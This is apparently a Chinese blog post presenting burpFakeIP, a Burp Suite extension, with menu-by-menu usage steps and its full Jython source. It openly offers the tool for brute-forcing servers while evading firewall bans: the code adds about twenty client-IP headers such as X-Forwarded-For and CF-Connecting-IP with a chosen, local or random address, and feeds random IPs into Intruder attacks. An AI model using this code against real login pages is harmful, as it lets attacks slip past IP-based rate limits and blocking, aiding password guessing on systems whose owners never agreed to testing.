Burp Suite插件之ip伪造插件burpFakeIP

ip伪造插件简介

burpFakeIP是一个伪造ip地址进行服务器爆破的burpsuite插件,主要用来躲避防火墙封锁.
项目地址:GitHub

Attention!

伪造随机ip爆破的先决条件可以伪造ip绕过服务器限制。

功能

①伪造指定ip
②伪造本地ip
③伪造随机ip
④随机ip爆破

Burp Suite插件之ip伪造插件burpFakeIP

0x01 伪造指定ip

Repeater模块右键选择fakeIp菜单,然后点击inputIP功能,然后输入指定的ip:

Burp Suite插件之ip伪造插件burpFakeIP
Burp Suite插件之ip伪造插件burpFakeIP
Burp Suite插件之ip伪造插件burpFakeIP
Burp Suite插件之ip伪造插件burpFakeIP

程序会自动添加所有可伪造得字段到请求头中。

0x02 伪造本地ip

Repeater模块右键选择fakeIp菜单,然后点击127.0.0.1功能:

Burp Suite插件之ip伪造插件burpFakeIP
Burp Suite插件之ip伪造插件burpFakeIP

0x03 伪造随机ip

Repeater模块右键选择fakeIp菜单,然后点击randomIP功能:

Burp Suite插件之ip伪造插件burpFakeIP
Burp Suite插件之ip伪造插件burpFakeIP

0x04 随机ip爆破

伪造随机ip爆破是本插件最核心的功能。

将数据包发送到Intruder模块,在Positions中切换Attack typePitchfork模式,选择好有效的伪造字段,以及需要爆破的字段:

Burp Suite插件之ip伪造插件burpFakeIP
Burp Suite插件之ip伪造插件burpFakeIP

按照箭头顺序将Payload来源设置为Extensin-generated,并设置负载伪fakeIpPayloads,然后设置第二个变量。 

Burp Suite插件之ip伪造插件burpFakeIP
Burp Suite插件之ip伪造插件burpFakeIP

点击Start attack开始爆破.

Burp Suite插件之ip伪造插件burpFakeIP
Burp Suite插件之ip伪造插件burpFakeIP

如上图,实现每次爆破都使用不同的伪ip进行,避免被ban。

fakeIP.py 

# -*- coding: utf-8 -*-
"""
-------------------------------------------------
   File Name:     fakeIP
   Description :
   Author :       CoolCat
   date:          2019-06-05
-------------------------------------------------
   Change Activity:
                   2019-06-05:
-------------------------------------------------
"""
__author__ = 'CoolCat'
import sys

reload(sys)
sys.setdefaultencoding('utf-8')
import random
from burp import ITab
from javax.swing import JMenu
from javax.swing import JMenuItem
from burp import IBurpExtender
from burp import IHttpListener
from java.io import PrintWriter
from burp import IContextMenuFactory
from burp import IIntruderPayloadGeneratorFactory
from burp import IIntruderPayloadGenerator
from java.awt import GridBagLayout, GridBagConstraints
from javax.swing import JLabel, JTextField, JOptionPane, JTabbedPane, JPanel, JButton


class BurpExtender(IBurpExtender, IHttpListener, IContextMenuFactory, IIntruderPayloadGeneratorFactory):
    def registerExtenderCallbacks(self, callbacks):

        print "[+] #####################################"
        print "[+]    fakeIp for burp V1.0"
        print "[+]    anthor: CoolCat"
        print "[+]    email: CoolCat@gzsec.org"
        print "[+]    gayhub:https://github.com/TheKingOfDuck"
        print "[+] #####################################"

        print "\n[-]fakeIp loading..."

        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
        callbacks.setExtensionName("fakeIp")
        callbacks.registerHttpListener(self)
        callbacks.registerContextMenuFactory(self)
        self.stdout = PrintWriter(callbacks.getStdout(), True)
        self.stderr = PrintWriter(callbacks.getStderr(), True)
        callbacks.issueAlert("Loaded Successfull.")

        # obtain an extension helpers object
        self._helpers = callbacks.getHelpers()

        # register ourselves as an Intruder payload generator
        callbacks.registerIntruderPayloadGeneratorFactory(self)

        print "[*]Successfull..."

    def createMenuItems(self, invocation):
        self.menus = []
        self.mainMenu = JMenu("fakeIp")
        self.menus.append(self.mainMenu)
        self.invocation = invocation
        # print invocation.getSelectedMessages()[0].getRequest()
        menuItem = ['inputIP', '127.0.0.1', 'randomIP']
        for tool in menuItem:
            # self.mainMenu.add(JMenuItem(tool))
            if tool == 'inputIP':
                menu = JMenuItem(tool, None, actionPerformed=lambda x: self.modifyHeader(x))
                self.mainMenu.add(menu)
            elif tool == '127.0.0.1':
                menu = JMenuItem(tool, None, actionPerformed=lambda x: self.modifyHeader(x))
                self.mainMenu.add(menu)
            elif tool == 'randomIP':
                menu = JMenuItem(tool, None, actionPerformed=lambda x: self.modifyHeader(x))
                self.mainMenu.add(menu)

        return self.menus if self.menus else None

    def addIPs(self, ip):

            currentRequest = self.invocation.getSelectedMessages()[0]  # getSelectedMessages()返回数组,但有时为1个,有时2个
            requestInfo = self._helpers.analyzeRequest(currentRequest)  # 该部分实际获取到的是全部的Http请求包
            self.headers = list(requestInfo.getHeaders())

            self.headers.append(u'X-Forwarded-For:' + ip)
            self.headers.append(u'X-Forwarded:' + ip)
            self.headers.append(u'Forwarded-For:' + ip)
            self.headers.append(u'Forwarded:' + ip)
            self.headers.append(u'X-Forwarded-Host:' + ip)
            self.headers.append(u'X-remote-IP:' + ip)
            self.headers.append(u'X-remote-addr:' + ip)
            self.headers.append(u'True-Client-IP:' + ip)
            self.headers.append(u'X-Client-IP:' + ip)
            self.headers.append(u'Client-IP:' + ip)
            self.headers.append(u'X-Real-IP:' + ip)
            self.headers.append(u'Ali-CDN-Real-IP:' + ip)
            self.headers.append(u'Cdn-Src-Ip:' + ip)
            self.headers.append(u'Cdn-Real-Ip:' + ip)
            self.headers.append(u'CF-Connecting-IP:' + ip)
            self.headers.append(u'X-Cluster-Client-IP:' + ip)
            self.headers.append(u'WL-Proxy-Client-IP:' + ip)
            self.headers.append(u'Proxy-Client-IP:' + ip)
            self.headers.append(u'Fastly-Client-Ip:' + ip)
            self.headers.append(u'True-Client-Ip:' + ip)



        

            

            # print 'self.headers',self.headers
            bodyBytes = currentRequest.getRequest()[requestInfo.getBodyOffset():]  # bytes[]类型
            self.body = self._helpers.bytesToString(bodyBytes)  # bytes to string转换一下
            # print 'self.body:',self.body
            newMessage = self._helpers.buildHttpMessage(self.headers, self.body)
            currentRequest.setRequest(newMessage)  # setRequest() 会动态更新setRequest\



    def modifyHeader(self, x):
        if x.getSource().text == 'inputIP':  # 通过获取当前点击的子菜单的 text 属性,确定当前需要执行的 command
            ip = JOptionPane.showInputDialog("Pls input ur ip:");

            self.addIPs(ip)
        elif x.getSource().text == '127.0.0.1':
            self.addIPs("127.0.0.1")

        elif x.getSource().text == 'randomIP':

            a = str(int(random.uniform(1, 255)))
            b = str(int(random.uniform(1, 255)))
            c = str(int(random.uniform(1, 255)))
            d = str(int(random.uniform(1, 255)))
            ip = a + "." + b + "." + c + "." + d

            self.addIPs(ip)

    def getGeneratorName(self):
        return "fakeIpPayloads"

    def createNewInstance(self, attack):
        return fakeIpGenerator(self, attack)


# 定义fakeIpGenerator类,扩展了IIntruderPayloadGenerator类
# 增加了max_payload(最大的payload), num_iterations(迭代次数)两个变量,用于控制模糊测试的次数
class fakeIpGenerator(IIntruderPayloadGenerator):
    def __init__(self, extender, attack):
        self._extender = extender
        self._helpers = extender._helpers
        self._attack = attack
        self.max_payload = 1
        self.num_iterations = 0
        return

    # 通过比较判断迭代是否达到上限
    def hasMorePayloads(self):
        if self.num_iterations == self.max_payload:
            return False
        else:
            return True

    # 接受原始的HTTP负载,current_payload是数组,
    def getNextPayload(self, current_payload):
        a = str(int(random.uniform(1, 255)))
        b = str(int(random.uniform(1, 255)))
        c = str(int(random.uniform(1, 255)))
        d = str(int(random.uniform(1, 255)))

        payload = a + "." + b + "." + c + "." + d

        return payload